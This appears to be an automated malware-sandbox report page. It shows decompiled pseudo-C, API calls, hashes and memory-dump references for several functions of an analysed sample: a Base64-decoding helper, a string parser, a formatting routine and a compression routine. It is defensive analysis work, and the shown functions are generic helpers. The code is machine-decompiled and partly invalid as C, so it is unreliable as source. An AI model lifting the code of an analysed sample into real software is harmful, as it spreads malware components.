Opcode Fuzzy Hash: 806676a9ac2160821656b73c3c3d18db0ff4a4b5fcef53e859bad7cfc76f4798
Instruction Fuzzy Hash: 3F129EB1604309ABD720DF24D885BBB77E6AF84344F14842CFA4A973A2EB71DD05CB56

Uniqueness

Uniqueness Score: -1.00%

Function 006F08A0, Relevance: 3.1, APIs: 2, Instructions: 57encryptionCOMMON

Download Yara Rule

APIs

CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 006F08C1

Part of subcall function 006E3180: GetProcessHeap.KERNEL32(00000000,00000000,006F2549,?,00000000,00000001,00000000), ref: 006E3193
Part of subcall function 006E3180: RtlReAllocateHeap.NTDLL(002B0000,00000008,?,?), ref: 006E31B0

CryptStringToBinaryW.CRYPT32(?,00000000,00000007,00000000,?,00000000,00000000), ref: 006F08EC

Memory Dump Source

Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_______.jbxd

Similarity

API ID: BinaryCryptHeapString$AllocateProcess
String ID:
API String ID: 3825993179-0
Opcode ID: 012e7b7b38fd28b29e0ee91931b0e86bef51c58611c71a8dda0cf1d8cf5c74ea
Instruction ID: 7e1d610b48c9337360da2d614251c46e7df5fcc8d75be8e3a3381241c21472c3
Opcode Fuzzy Hash: 012e7b7b38fd28b29e0ee91931b0e86bef51c58611c71a8dda0cf1d8cf5c74ea
Instruction Fuzzy Hash: E50192716042287BE2208B16DC44FABBEEEEF49B98F01402DF54897252D2A1DD00CAF1

Uniqueness

Uniqueness Score: -1.00%

Function 006F3430, Relevance: 2.6, APIs: 2, Instructions: 143
stringCOMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E006F3430() {
				void* _t36;
				intOrPtr* _t37;
				void* _t38;
				WCHAR** _t48;
				WCHAR* _t50;
				WCHAR** _t51;
				WCHAR** _t55;
				signed int _t57;
				WCHAR** _t58;
				void* _t59;
				WCHAR** _t62;
				WCHAR* _t63;
				intOrPtr _t67;
				WCHAR** _t68;
				signed int _t70;
				void* _t71;
				void* _t73;
				WCHAR** _t75;
				WCHAR** _t76;
				WCHAR** _t78;
				intOrPtr* _t79;
				void* _t80;
				WCHAR*** _t81;
				WCHAR*** _t82;

				_t67 =  *((intOrPtr*)(_t79 + 0x30));
				_t57 = 0;
				 *_t79 = 0;
				 *((intOrPtr*)(_t79 + 8)) = 0;
				if(_t67 != 0) {
					_t36 = E006EC380(_t67, 0, _t79 + 8,  *((intOrPtr*)(_t79 + 0x34)));
					_t80 = _t79 + 0x10;
					if(_t36 != 0) {
						_t37 = _t80 + 0xc;
						 *_t37 = 0x2f;
						_push(6);
						_push(_t80);
						_push(_t37);
						_push( *((intOrPtr*)(_t80 + 0x14)));
						_t38 = E006E9FF0();
						_t81 = _t80 + 0x10;
						_t57 = 0;
						_t73 = _t38;
						_t75 = 0;
						_t81[1] = 0;
						if(_t38 == 6) {
							_t58 = _t81[0x10];
							_t48 = E006E8C50(( *_t81)[4]);
							_t82 =  &(_t81[1]);
							_t76 = _t48;
							_t50 = E006E8C50(( *_t82)[3]);
							_t81 =  &(_t82[1]);
							 *_t58 = _t50;
							if(_t76 == 0) {
								_t57 = 0;
								_t81[1] = 0;
								goto L13;
							} else {
								_t51 =  *_t81;
								_t57 = 0;
								_t81[1] = _t76;
								_t63 = _t51[5];
								if(( *_t63 & 0x0000ffff) != 0xd) {
									L13:
									_t75 = 0;
								} else {
									_t57 = 0;
									if((_t63[1] & 0x0000ffff) != 0xa) {
										goto L13;
									} else {
										_t71 = _t67 + lstrlenW( *_t51) + 2;
										_t59 = 0xfffffff0;
										do {
											_t71 = _t71 + lstrlenW( *( *_t81 + _t59 + 0x14)) + 1;
											_t59 = _t59 + 4;
										} while (_t59 != 0);
										_t78 = _t81[1];
										_t57 = 0;
										if( *((char*)(_t71 +  &(_t78[0]))) != 0xd) {
											goto L13;
										} else {
											_t72 = _t71 + 2;
											_t57 = 0;
											if( *((char*)(_t71 + 2 +  &(_t78[0]))) != 0xa) {
												goto L13;
											} else {
												_t55 = E006E3180(_t78, 0);
												_t81 =  &(_t81[2]);
												if(_t55 == 0) {
													_t57 = 0;
													goto L13;
												} else {
													_t75 = _t55;
													E006EC400(_t55, _t72, _t78);
													_t81 =  &(_t81[3]);
													_t57 = 1;
												}
											}
										}
									}
								}
							}
						}
						_t39 = _t81[2];
						if(_t81[2] != 0) {
							E006E91E0(_t39);
							_t81 =  &(_t81[1]);
						}
						_t40 =  *_t81;
						_t68 = _t81[0xf];
						_t62 = _t81[0xe];
						if( *_t81 != 0) {
							if(_t73 != 0) {
								E006E91E0( *_t40);
								_t81 =  &(_t81[1]);
								if(_t73 != 1) {
									_t70 = 1;
									do {
										E006E91E0(( *_t81)[_t70]);
										_t81 =  &(_t81[1]);
										_t70 = _t70 + 1;
									} while (_t73 != _t70);
								}
								_t40 =  *_t81;
								_t68 = _t81[0xf];
							}
							E006E91E0(_t40);
							_t81 =  &(_t81[1]);
							_t62 = _t81[0xe];
						}
						 *_t62 = _t75;
						 *_t68 = _t81[1];
					}
				}
				return _t57;
			}

0x006f3437
0x006f343b
0x006f343d
0x006f3440
0x006f3446
0x006f3458
0x006f345d
0x006f3462
0x006f3468
0x006f3473
0x006f3479
0x006f347a
0x006f347b
0x006f347c
0x006f3480
0x006f3485
0x006f3488
0x006f348c
0x006f348e
0x006f3493
0x006f349b
0x006f34a4
0x006f34ab
0x006f34b0
0x006f34b3
0x006f34bb
0x006f34c0
0x006f34c5
0x006f34c7
0x006f3555
0x006f3557
0x00000000
0x006f34cd
0x006f34cd
0x006f34d0
0x006f34d2
0x006f34d6
0x006f34df
0x006f355f
0x006f355f
0x006f34e1
0x006f34e5
0x006f34ea
0x00000000
0x006f34ec
0x006f34fa
0x006f34fe
0x006f3503
0x006f350c
0x006f3510
0x006f3510
0x006f3515
0x006f3519
0x006f3520
0x00000000
0x006f3522
0x006f3522
0x006f3525
0x006f352c
0x00000000
0x006f352e
0x006f3531
0x006f3536
0x006f353b
0x006f35d2
0x00000000
0x006f3541
0x006f3543
0x006f3548
0x006f354d
0x006f3552
0x006f3552
0x006f353b
0x006f352c
0x006f3520
0x006f34ea
0x006f34df
0x006f34c7
0x006f3561
0x006f3567
0x006f356a
0x006f356f
0x006f356f
0x006f3572
0x006f3575
0x006f3579
0x006f357f
0x006f3583
0x006f3587
0x006f358c
0x006f3592
0x006f3596
0x006f3597
0x006f359d
0x006f35a2
0x006f35a5
0x006f35a6
0x006f3597
0x006f35aa
0x006f35ad
0x006f35ad
0x006f35b2
0x006f35b7
0x006f35ba
0x006f35ba
0x006f35c2
0x006f35c4
0x006f35c4
0x006f3462
0x006f35cf

APIs

Part of subcall function 006EC380: MultiByteToWideChar.KERNEL32(00000000,00000000,0000FDE9,00000000,00000000,00000000,00000000,00000000,?,00000010,006E8EF7,?,0000FDE9,00000010,000000FF,00000010), ref: 006EC396
Part of subcall function 006EC380: MultiByteToWideChar.KERNEL32(?,00000000,0000FDE9,?,00000000,00000000), ref: 006EC3C4

lstrlenW.KERNEL32(00000000), ref: 006F34EE
lstrlenW.KERNEL32(?), ref: 006F350A

Memory Dump Source

Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_______.jbxd

Similarity

API ID: ByteCharMultiWidelstrlen
String ID:
API String ID: 3109718747-0
Opcode ID: 99684c955a829836ccc2d6c8a3607726af3763c13850f76ca6f98eb2cac686ac
Instruction ID: a648e14a4528a1a7ff921f7e02cce9eadf31a075e2f9aaf705cd3fb00a972104
Opcode Fuzzy Hash: 99684c955a829836ccc2d6c8a3607726af3763c13850f76ca6f98eb2cac686ac
Instruction Fuzzy Hash: 5B41E4B1608318AFD751AF69D885A7BB7E6EF84308F44443CFA4987352EA31EE14C752

Uniqueness

Uniqueness Score: -1.00%

Function 006EF0E0, Relevance: 1.8, APIs: 1, Instructions: 282
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E006EF0E0() {
				short* _t72;
				short* _t73;
				signed char _t74;
				signed char* _t76;
				void* _t80;
				void* _t82;
				void* _t85;
				short** _t90;
				short* _t97;
				void* _t102;
				char* _t106;
				signed char _t108;
				signed char _t109;
				short** _t113;
				short** _t114;
				signed char _t116;
				unsigned int _t118;
				short** _t123;
				short** _t126;
				void* _t127;
				short** _t132;
				signed int _t133;
				void* _t136;
				short** _t138;
				short* _t141;
				signed int _t143;
				short** _t145;
				signed int _t146;
				signed int _t148;
				short** _t153;
				short** _t154;
				short*** _t155;
				char _t173;
				short** _t181;

				_t113 = _t155[0x10f];
				_t148 = _t155[0x10e];
				 *_t155 =  &(_t155[0x111]);
				_t132 = _t113 + _t148;
				if(_t113 > 0) {
					_t153 = _t155[0x110];
					_t148 = _t155[0x10e];
					_t72 =  *_t153;
					if(_t72 != 0) {
						_t155[1] = _t132;
						_t133 = _t155[0x10e];
						_t155[7] =  ~_t133 - _t113;
						_t148 = _t133;
						_t132 = _t155[1];
						do {
							if(_t72 != 0x25) {
								 *_t148 = _t72;
								goto L10;
							} else {
								_t73 = _t153[0];
								_t114 =  &(_t153[0]);
								_t155[8] = 0;
								if(_t73 + 0xd0 > 9) {
									_t74 = 0x20;
								} else {
									_t154 =  &(_t153[0]);
									_t146 = 0;
									_t141 = _t73;
									do {
										_t146 = _t141 + (_t146 + _t146 * 4) * 2 - 0x30;
										_t141 =  *_t154;
										_t154 =  &(_t154[0]);
									} while (_t141 + 0xd0 < 0xa);
									do {
										_t143 = _t114[0];
										_t114 =  &(_t114[0]);
										_t102 = _t143 + 0xd0;
									} while (_t102 < 0xa);
									_t74 = (_t143 & 0xffffff00 | _t102 == 0x00000030) << 0x00000004 | 0x00000020;
								}
								_t132 = _t155[1];
								if(_t74 == 0x6c) {
									_t74 = _t114[0];
									_t114 =  &(_t114[0]);
								}
								_t153 = _t114;
								if(_t74 > 0x57) {
									_t155[2] = _t74;
									_t116 = _t74 + 0x90;
									if(_t116 > 8) {
										if(_t74 == 0x58) {
											_t75 =  *_t155;
											_t136 = 0;
											_t44 =  &(_t75[1]); // 0x24
											 *_t155 = _t44;
											_t118 =  *( *_t155);
											_t76 =  &(_t155[6]);
											_t155[6] = 0;
											while(_t118 != 0) {
												_t108 = _t118 & 0x0000000f;
												if(_t108 < 0xa) {
													_t109 = _t108 | 0x00000030;
												} else {
													_t109 = _t108 + 0x37;
												}
												_t136 = _t136 + 1;
												 *_t76 = _t109;
												_t76 = _t76 - 1;
												_t118 = _t118 >> 4;
												if(_t136 < 8) {
													continue;
												}
												goto L50;
											}
											goto L50;
										} else {
											if(_t74 == 0x64) {
												_t91 =  *_t155;
												_t106 =  &(_t155[8]);
												_t36 =  &(_t91[1]); // 0x24
												 *_t155 = _t36;
												_push(_t106);
												_push( *( *_t155));
												E006E5BE0();
												goto L36;
											}
										}
									} else {
										switch( *((intOrPtr*)((_t116 & 0x000000ff) * 4 +  &M006EF408))) {
											case 0:
												_t94 =  *_t155;
												_t139 = 0;
												_t31 =  &(_t94[1]); // 0x24
												 *_t155 = _t31;
												_t130 =  *( *_t155);
												_t95 =  &(_t155[6]);
												_t155[6] = 0;
												do {
													_t111 = _t130 & 0x0000000f;
													if(_t111 < 0xa) {
														_t112 = _t111 | 0x00000030;
													} else {
														_t112 = _t111 + 0x37;
													}
													_t139 = _t139 + 1;
													 *(_t95 - 1) = _t112;
													_t95 = _t95 - 1;
													_t130 = _t130 >> 4;
												} while (_t139 < 8);
												goto L51;
											case 1:
												goto L65;
											case 2:
												__eax =  *__esp;
												__ecx =  &(__eax[4]);
												 *__esp =  &(__eax[4]);
												if( *__eax != 0) {
													goto L53;
												} else {
												}
												goto L65;
											case 3:
												__eax =  *__esp;
												__ecx =  &(__eax[4]);
												 *__esp =  &(__eax[4]);
												__eax = E006E81C0( *__eax,  &(__esp[8]));
												L36:
												_t132 = _t155[3];
												_t155 =  &(_t155[2]);
												goto L53;
											case 4:
												__eax =  *__esp;
												__edx = 0;
												_t41 =  &(__eax[4]); // 0x4
												__ecx = _t41;
												 *__esp = _t41;
												__ecx =  *( *__esp);
												__eax =  &(__esp[6]);
												__esp[6] = 0;
												while(__ecx != 0) {
													if((__ecx & 0x0000000f) < 0xa) {
														__bl = __bl | 0x00000030;
													} else {
														__bl = __bl + 0x57;
													}
													__edx = __edx + 1;
													 *__eax = __bl;
													__eax = __eax - 1;
													__ecx = __ecx >> 4;
													if(__edx < 8) {
														continue;
													} else {
													}
													break;
												}
												L50:
												_t77 =  &(_t76[1]);
												L51:
												_t106 =  &(_t155[0xa]);
												E006EC400(_t106, _t77,  &(_t155[7]) - _t77);
												_t155 =  &(_t155[3]);
												goto L52;
										}
									}
									goto L65;
								} else {
									if(_t74 == 0x25) {
										 *_t148 = 0x25;
										L10:
										_t148 = _t148 + 1;
										goto L65;
									} else {
										if(_t74 != 0x53) {
											if(_t74 != 0) {
												goto L65;
											} else {
											}
										} else {
											_t155[2] = _t74;
											_t96 =  *_t155;
											_t106 =  &(_t155[8]);
											_t26 =  &(_t96[1]); // 0x24
											 *_t155 = _t26;
											_t97 =  *( *_t155);
											if(_t97 != 0) {
												_t106 =  &(_t155[0xb]);
												WideCharToMultiByte(0xfde9, 0, _t97, 0xffffffff, _t106, 0x400, 0, 0);
												L52:
												_t132 = _t155[1];
											}
											L53:
											_t80 = _t132 - _t148;
											if( *_t106 != 0) {
												_t127 = 0;
												do {
													_t173 = _t106[_t127 + 1];
													_t127 = _t127 + 1;
												} while (_t173 != 0);
											}
											_t138 =  <  ? 0 : _t80 - 1;
											_t82 = 0 - _t138;
											_t155[3] = _t138;
											if(_t82 > 0 && _t148 < _t155[1] && _t82 != 0) {
												_t85 = _t155[7] + _t148;
												_t123 = _t155[3];
												_t124 =  <  ? _t85 : _t123;
												_t125 =  ~( <  ? _t85 : _t123);
												E006F6610(_t148, _t155[2] & 0x000000ff,  ~( <  ? _t85 : _t123));
												_t126 = _t155[4];
												_t155 =  &(_t155[3]);
												_t90 =  &(_t155[3][0]);
												while(1) {
													_t148 = _t148 + 1;
													if(_t148 >= _t126) {
														goto L64;
													}
													_t181 = _t90;
													_t90 =  &(_t90[0]);
													if(_t181 != 0) {
														continue;
													}
													goto L64;
												}
											}
											L64:
											_t145 = _t155[3];
											E006EC400(_t148, _t106, _t145);
											_t132 = _t155[4];
											_t155 =  &(_t155[3]);
											_t148 = _t145 + _t148;
											L65:
											if(_t148 < _t132) {
												goto L66;
											}
										}
									}
								}
							}
							goto L67;
							L66:
							_t72 = _t153[0];
							_t153 =  &(_t153[0]);
						} while (_t72 != 0);
					}
				}
				L67:
				_t70 =  <  ? _t148 : _t132 - 1;
				 *((char*)( <  ? _t148 : _t132 - 1)) = 0;
				return _t148 - _t155[0x10e];
			}

0x006ef0ea
0x006ef0f1
0x006ef0ff
0x006ef102
0x006ef107
0x006ef10d
0x006ef114
0x006ef11b
0x006ef120
0x006ef126
0x006ef12a
0x006ef137
0x006ef13b
0x006ef13d
0x006ef141
0x006ef143
0x006ef196
0x00000000
0x006ef145
0x006ef145
0x006ef148
0x006ef14b
0x006ef158
0x006ef1a0
0x006ef15a
0x006ef15a
0x006ef15d
0x006ef15f
0x006ef161
0x006ef167
0x006ef16b
0x006ef16e
0x006ef174
0x006ef179
0x006ef179
0x006ef17c
0x006ef17f
0x006ef182
0x006ef191
0x006ef191
0x006ef1a2
0x006ef1a8
0x006ef1aa
0x006ef1ad
0x006ef1ad
0x006ef1ae
0x006ef1b2
0x006ef203
0x006ef207
0x006ef20d
0x006ef25d
0x006ef302
0x006ef305
0x006ef307
0x006ef30a
0x006ef30d
0x006ef30f
0x006ef313
0x006ef318
0x006ef31e
0x006ef324
0x006ef32b
0x006ef326
0x006ef326
0x006ef326
0x006ef32e
0x006ef32f
0x006ef331
0x006ef332
0x006ef338
0x00000000
0x00000000
0x00000000
0x006ef338
0x00000000
0x006ef263
0x006ef265
0x006ef26b
0x006ef26e
0x006ef272
0x006ef275
0x006ef278
0x006ef279
0x006ef27b
0x00000000
0x006ef27b
0x006ef265
0x006ef20f
0x006ef212
0x00000000
0x006ef219
0x006ef21c
0x006ef21e
0x006ef221
0x006ef224
0x006ef226
0x006ef22a
0x006ef22f
0x006ef231
0x006ef237
0x006ef23e
0x006ef239
0x006ef239
0x006ef239
0x006ef241
0x006ef242
0x006ef245
0x006ef246
0x006ef249
0x00000000
0x00000000
0x00000000
0x00000000
0x006ef28f
0x006ef292
0x006ef295
0x006ef29c
0x00000000
0x00000000
0x006ef2a2
0x00000000
0x00000000
0x006ef2a7
0x006ef2ae
0x006ef2b1
0x006ef2b7
0x006ef2bc
0x006ef2bc
0x006ef2c0
0x00000000
0x00000000
0x006ef2c8
0x006ef2cb
0x006ef2cd
0x006ef2cd
0x006ef2d0
0x006ef2d3
0x006ef2d5
0x006ef2d9
0x006ef2de
0x006ef2ea
0x006ef2f1
0x006ef2ec
0x006ef2ec
0x006ef2ec
0x006ef2f4
0x006ef2f5
0x006ef2f7
0x006ef2f8
0x006ef2fe
0x00000000
0x00000000
0x006ef300
0x00000000
0x006ef2fe
0x006ef33a
0x006ef33a
0x006ef33b
0x006ef343
0x006ef348
0x006ef34d
0x00000000
0x00000000
0x006ef212
0x00000000
0x006ef1b4
0x006ef1b6
0x006ef253
0x006ef198
0x006ef198
0x00000000
0x006ef1bc
0x006ef1be
0x006ef284
0x00000000
0x00000000
0x006ef28a
0x006ef1c4
0x006ef1c4
0x006ef1c8
0x006ef1cb
0x006ef1cf
0x006ef1d2
0x006ef1d5
0x006ef1d9
0x006ef1e8
0x006ef1f6
0x006ef350
0x006ef350
0x006ef350
0x006ef354
0x006ef356
0x006ef35b
0x006ef35d
0x006ef35f
0x006ef35f
0x006ef364
0x006ef364
0x006ef369
0x006ef374
0x006ef377
0x006ef379
0x006ef37d
0x006ef391
0x006ef394
0x006ef398
0x006ef3a0
0x006ef3a5
0x006ef3aa
0x006ef3ae
0x006ef3b6
0x006ef3b8
0x006ef3b8
0x006ef3bb
0x00000000
0x00000000
0x006ef3bd
0x006ef3bf
0x006ef3c2
0x00000000
0x00000000
0x00000000
0x006ef3c2
0x006ef3b8
0x006ef3c4
0x006ef3c4
0x006ef3cb
0x006ef3d0
0x006ef3d4
0x006ef3d7
0x006ef3d9
0x006ef3db
0x00000000
0x00000000
0x006ef3db
0x006ef1be
0x006ef1b6
0x006ef1b2
0x00000000
0x006ef3dd
0x006ef3dd
0x006ef3e0
0x006ef3e1
0x006ef141
0x006ef120
0x006ef3e9
0x006ef3ee
0x006ef3f8
0x006ef407

APIs

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000400,00000000,00000000), ref: 006EF1F6

Memory Dump Source

Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_______.jbxd

Similarity

API ID: ByteCharMultiWide
String ID:
API String ID: 626452242-0
Opcode ID: b5451e085c02ba5f254344ccd38fdff766910eb3b7a3213b8625b5691e50fe6a
Instruction ID: 749775d80b44f305177475300421f846eec091dea9fb769cbb311c3a5837ec42
Opcode Fuzzy Hash: b5451e085c02ba5f254344ccd38fdff766910eb3b7a3213b8625b5691e50fe6a
Instruction Fuzzy Hash: 21A1E73420A3858FDB19CF19C8946EAB7E3EF85304F08856DE4D687345E6309D4BCB96

Uniqueness

Uniqueness Score: -1.00%

Function 006F35E0, Relevance: .4, Instructions: 423
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E006F35E0() {
				signed int _t144;
				signed int _t147;
				signed int _t157;
				signed int _t158;
				signed int _t162;
				signed int _t165;
				signed char _t170;
				signed char _t172;
				void* _t181;
				signed char _t186;
				signed int _t187;
				signed char _t198;
				signed char _t205;
				signed char _t221;
				signed int _t224;
				void* _t225;
				void* _t226;
				signed int _t227;
				signed int _t229;
				signed char _t231;
				signed int _t236;
				signed char _t237;
				signed int _t238;
				signed int _t245;
				signed int _t251;
				signed char _t252;
				signed char _t257;
				signed char _t262;
				signed int _t266;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				signed int _t276;
				signed char _t278;
				signed int _t279;
				signed int _t280;
				signed int _t281;
				unsigned int _t282;
				signed int _t283;
				signed int _t284;
				signed int _t285;
				signed int _t286;
				signed char _t290;
				signed int _t291;
				signed int _t301;
				signed int _t302;
				signed char _t303;
				signed int _t305;
				signed char _t306;
				signed int _t311;
				signed int* _t313;
				signed char _t316;
				signed char _t317;
				signed char _t318;
				signed int _t319;
				signed char _t320;
				signed int _t324;
				signed int _t326;
				signed char* _t327;
				signed char _t328;
				signed int _t330;
				signed char _t331;
				signed char* _t335;
				signed char _t336;
				signed int* _t338;
				void* _t342;

				_t319 = _t338[0xd];
				_t306 = _t338[0xe];
				_t144 = _t338[0xf];
				_t224 = _t338[0xc];
				_t231 = _t306;
				_t266 = _t319;
				if(_t319 >= 0xe) {
					_t302 = _t224 + 4;
					_t237 = _t306;
					_t338[3] = _t224;
					_t338[6] = _t224 + _t319 - 0xd;
					_t338[5] = _t224 + _t319;
					do {
						_t227 = _t338[0x10];
						_t303 = _t302 + 4;
						_t338[1] = _t237;
						do {
							_t238 =  *(_t303 - 1) & 0x000000ff;
							_t157 =  *(_t303 - 2) & 0x000000ff;
							_t35 = _t303 - 4; // -8
							_t273 = _t35;
							 *_t338 = _t273;
							_t338[2] = _t238;
							_t338[4] = _t157;
							_t245 = (( *(_t303 - 4) & 0x000000ff ^ ( *(_t303 - 3) & 0x000000ff ^ (_t238 << 0x00000006 ^ _t157) << 0x00000005) << 0x00000005) << 5) + ( *(_t303 - 4) & 0x000000ff ^ ( *(_t303 - 3) & 0x000000ff ^ (_t238 << 0x00000006 ^ _t157) << 0x00000005) << 0x00000005) >> 5;
							_t324 = _t245 & 0x00003fff;
							_t158 =  *(_t227 + _t324 * 4);
							if(_t158 >= _t338[0xc]) {
								_t274 = _t273 - _t158;
								_t41 = _t274 - 1; // -9
								__eflags = _t41 - 0xbffe;
								if(_t41 <= 0xbffe) {
									__eflags = _t274 - 0x801;
									_t229 = _t274;
									if(_t274 >= 0x801) {
										_t275 = _t338[2];
										_t311 = _t338[0x10];
										__eflags =  *((intOrPtr*)(_t158 + 3)) - _t275;
										if( *((intOrPtr*)(_t158 + 3)) != _t275) {
											_t324 = _t245 & 0x000007ff ^ 0x0000201f;
											_t158 =  *(_t311 + _t324 * 4);
											__eflags = _t158 - _t338[0xc];
											if(_t158 < _t338[0xc]) {
												goto L23;
											} else {
												_t229 =  *_t338 - _t158;
												_t53 = _t229 - 1; // -9
												__eflags = _t53 - 0xbffe;
												if(_t53 <= 0xbffe) {
													__eflags = _t229 - 0x801;
													if(_t229 < 0x801) {
														goto L18;
													} else {
														__eflags =  *((intOrPtr*)(_t158 + 3)) - _t275;
														if( *((intOrPtr*)(_t158 + 3)) == _t275) {
															goto L18;
														} else {
															goto L23;
														}
													}
												} else {
													goto L23;
												}
											}
										} else {
											goto L18;
										}
									} else {
										_t311 = _t338[0x10];
										L18:
										__eflags = ( *_t158 & 0x0000ffff) -  *(_t303 - 4);
										if(( *_t158 & 0x0000ffff) !=  *(_t303 - 4)) {
											goto L23;
										} else {
											__eflags =  *((intOrPtr*)(_t158 + 2)) - _t338[4];
											if( *((intOrPtr*)(_t158 + 2)) != _t338[4]) {
												goto L23;
											} else {
												_t338[4] = _t158;
												_t162 =  *_t338;
												_t251 = _t338[3];
												_t338[2] = _t229;
												 *(_t311 + _t324 * 4) = _t162;
												_t278 = _t162 - _t251;
												__eflags = _t278;
												if(_t278 <= 0) {
													 *_t338 = _t251;
													_t252 = _t338[1];
													_t224 = _t338[0xc];
												} else {
													_t262 = _t338[1];
													_t224 = _t338[0xc];
													__eflags = _t278 - 3;
													_t317 = _t278;
													if(_t278 > 3) {
														__eflags = _t278 - 0x12;
														if(_t278 > 0x12) {
															_t290 = _t278 - 0x12;
															_t335 = _t262 + 1;
															 *_t262 = 0;
															__eflags = _t290 - 0x100;
															if(_t290 >= 0x100) {
																E006F6610(_t335, 0, ((0xfffffeee - _t338[3] + _t162) * 0x80808081 >> 0x20 >> 7) + 1);
																_t338 =  &(_t338[3]);
																_t290 = (( *_t338 - 0x112 - _t338[3]) * 0x80808081 >> 0x20 >> 7) - (0x80808081 << 8) +  *_t338 - 0x111 - _t338[3];
																__eflags = _t290;
																_t221 =  &(_t335[0xffffffff80808081]);
																_t335 = _t338[1] + 0xffffffff80808083;
																_t262 = _t221;
															}
															_t262 = _t262 + 2;
															__eflags = _t262;
															 *_t335 = _t290;
														} else {
															 *_t262 = _t278 + 0xfd;
															_t262 = _t262 + 1;
														}
													} else {
														 *(_t262 - 2) =  *(_t262 - 2) | _t278;
													}
													_t291 = _t338[3];
													_t205 = 0;
													__eflags = 0;
													_t336 = _t317;
													do {
														_t318 = _t262;
														 *((char*)(_t318 + _t205)) =  *((intOrPtr*)(_t291 + _t205));
														_t205 = _t205 + 1;
														_t262 = _t318;
														__eflags = _t336 - _t205;
													} while (_t336 != _t205);
													_t252 = _t262 + _t336;
													__eflags = _t252;
												}
												_t279 = _t338[4];
												__eflags =  *((intOrPtr*)(_t279 + 3)) -  *(_t303 - 1);
												if( *((intOrPtr*)(_t279 + 3)) !=  *(_t303 - 1)) {
													L57:
													_t302 = _t303 - 1;
													_t280 = _t338[2];
													_t306 = _t338[0xe];
													_t165 = _t302 -  *_t338;
													__eflags = _t280 - 0x800;
													if(_t280 > 0x800) {
														__eflags = _t280 - 0x4000;
														if(_t280 > 0x4000) {
															_t281 = _t280 + 0xffffc000;
															_t327 = _t252;
															_t257 =  &(_t327[1]);
															__eflags = _t257;
															 *_t327 = _t165 + 0x000000fe | _t281 >> 0x0000000b & 0x00000008 | 0x00000010;
														} else {
															_t281 = _t280 - 1;
															_t172 = _t165 + 0x000000fe | 0x00000020;
															__eflags = _t172;
															goto L61;
														}
														goto L63;
													} else {
														_t283 = _t280 - 1;
														_t328 = _t252;
														_t282 = _t283 >> 3;
														_t257 = _t328;
														 *_t328 = (_t165 << 5) + 0xe0 + (_t283 & 0x00000007) * 4;
													}
												} else {
													__eflags =  *((intOrPtr*)(_t279 + 4)) -  *_t303;
													if( *((intOrPtr*)(_t279 + 4)) !=  *_t303) {
														_t303 = _t303 + 1;
														goto L57;
													} else {
														__eflags =  *((intOrPtr*)(_t279 + 5)) -  *(_t303 + 1);
														if( *((intOrPtr*)(_t279 + 5)) !=  *(_t303 + 1)) {
															_t303 = _t303 + 2;
															goto L57;
														} else {
															__eflags =  *((intOrPtr*)(_t279 + 6)) -  *(_t303 + 2);
															if( *((intOrPtr*)(_t279 + 6)) !=  *(_t303 + 2)) {
																_t303 = _t303 + 3;
																goto L57;
															} else {
																__eflags =  *((intOrPtr*)(_t279 + 7)) -  *(_t303 + 3);
																if( *((intOrPtr*)(_t279 + 7)) !=  *(_t303 + 3)) {
																	_t303 = _t303 + 4;
																	__eflags = _t303;
																	goto L57;
																} else {
																	__eflags =  *((intOrPtr*)(_t279 + 8)) -  *(_t303 + 4);
																	_t303 = _t303 + 5;
																	if(__eflags != 0) {
																		goto L57;
																	} else {
																		_t284 = _t338[5];
																		__eflags = _t303 - _t284;
																		if(_t303 < _t284) {
																			_t316 = _t338[4] + 9;
																			__eflags = _t316;
																			while(1) {
																				__eflags =  *_t316 -  *_t303;
																				if( *_t316 !=  *_t303) {
																					goto L50;
																				}
																				_t303 = _t303 + 1;
																				_t316 = _t316 + 1;
																				__eflags = _t303 - _t284;
																				if(_t303 < _t284) {
																					continue;
																				}
																				goto L50;
																			}
																		}
																		L50:
																		_t285 = _t338[2];
																		_t181 = _t303 -  *_t338;
																		__eflags = _t285 - 0x4000;
																		if(_t285 > 0x4000) {
																			_t306 = _t338[0xe];
																			_t281 = _t285 + 0xffffc000;
																			__eflags = _t181 - 9;
																			if(_t181 > 9) {
																				_t338[2] = _t281;
																				_t286 = _t181 + 0xfffffff7;
																				_t186 = _t281 >> 0x0000000b & 0x00000008 | 0x00000010;
																				__eflags = _t186;
																				goto L6;
																			} else {
																				_t172 = _t181 + 0x000000fe | _t281 >> 0x0000000b & 0x00000008 | 0x00000010;
																				L61:
																				 *_t252 = _t172;
																				_t257 = _t252 + 1;
																			}
																		} else {
																			_t306 = _t338[0xe];
																			__eflags = _t181 - 0x21;
																			_t338[2] = _t285 - 1;
																			if(_t181 > 0x21) {
																				_t286 = _t181 + 0xffffffdf;
																				_t186 = 0x20;
																				L6:
																				 *_t252 = _t186;
																				_t313 = _t252 + 1;
																				__eflags = _t286 - 0x100;
																				_t187 = _t286;
																				if(_t286 >= 0x100) {
																					 *_t338 = _t187;
																					_t330 = ( *_t338 - 0x100) * 0x80808081 >> 0x20 >> 7;
																					_t20 = _t330 + 1; // 0x80808082
																					_t338[4] = _t252;
